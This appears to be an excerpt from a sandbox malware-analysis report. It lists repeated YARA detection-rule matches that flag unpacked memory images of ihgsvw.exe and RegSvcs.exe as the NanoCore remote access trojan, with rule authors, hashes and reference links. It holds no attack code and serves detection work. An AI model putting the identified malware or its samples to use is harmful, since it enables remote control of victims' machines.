Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
